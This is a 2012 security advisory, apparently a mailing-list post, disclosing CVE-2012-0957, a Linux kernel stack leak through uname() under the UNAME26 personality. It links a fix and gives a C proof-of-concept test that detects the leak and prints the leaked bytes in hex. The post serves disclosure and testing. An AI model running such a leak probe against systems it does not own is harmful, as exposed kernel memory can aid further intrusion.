
Linux kernel stack memory content leak via UNAME26


From: Kees Cook <keescook () chromium org>
Date: Tue, 9 Oct 2012 13:10:34 -0700

CVE-2012-0957

Calling uname() with the UNAME26 personality set allows a leak of kernel
stack contents.

Fix:

https://lkml.org/lkml/2012/10/9/550

PoC:


/* Test for UNAME26 personality uname kernel stack leak.
 * Copyright 2012, Kees Cook <keescook () chromium org>
 * License: GPLv3
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/personality.h>
#include <sys/utsname.h>

#define UNAME26 0x0020000

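/*
 * Call uname() and inspect the bytes of utsname.release that lie beyond
 * the string's NUL terminator. A fixed kernel zero-fills that tail; a
 * kernel affected by the UNAME26 bug leaves stale kernel stack contents
 * there, which is what this check detects.
 *
 * Prints the release string on one line and the tail bytes as hex on the
 * next.
 *
 * Returns the number of bytes examined past the terminator when any of
 * them is non-zero, and 0 when the tail is all zero (or there is no tail).
 * Exits the process with status 1 if uname() fails.
 */
int dump_uts(void)
{
        struct utsname buf = {0};

        if (uname(&buf)) {
                perror("uname");
                exit(1);
        }

        /* Bound the terminator search to the field itself rather than
         * trusting that release is NUL-terminated (strlen would otherwise
         * read past the end of the array). */
        const char *nul = memchr(buf.release, '\0', sizeof buf.release);
        size_t len = nul ? (size_t)(nul - buf.release) : sizeof buf.release;
        printf("%.*s\n", (int)len, buf.release);

        /* First byte after the terminator; size_t avoids the signed/unsigned
         * comparison against sizeof in the loop condition. */
        size_t tail_start = len + 1;
        int leaked = 0;
        for (size_t i = tail_start; i < sizeof buf.release; i++) {
                unsigned char c = (unsigned char)buf.release[i];

                printf("%02x", c);
                if (c)
                        leaked = 1;
        }
        printf("\n");

        /* Count reported is the number of tail bytes scanned, not the
         * number of non-zero ones (matches the original reporting). */
        if (!leaked)
                return 0;
        return (int)(sizeof buf.release - tail_start);
}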

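/*
 * Entry point: run the release-tail check once with the default
 * personality (as a control) and once with UNAME26 set.
 *
 * Exits 1 if either run reports a non-zero tail, or if personality()
 * fails; exits 0 when both tails are clean. Command-line arguments are
 * not used.
 */
int main(int ac, char **av)
{
        (void)ac;
        (void)av;

        /* Control run: with the default personality nothing should leak;
         * a hit here means the check itself, not UNAME26, is at fault. */
        int leaked = dump_uts();
        if (leaked) {
                printf("Leaked %d bytes even without UNAME26!?\n", leaked);
                return 1;
        }

        /* personality(2) returns the previous persona, or -1 on error. */
        if (personality(PER_LINUX | UNAME26) == -1) {
                perror("personality");
                return 1;
        }

        leaked = dump_uts();
        if (leaked) {
                printf("Leaked %d bytes!\n", leaked);
                return 1;
        }
        printf("Seems safe.\n");
        return 0;
}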

-- 
Kees Cook
Chrome OS Security

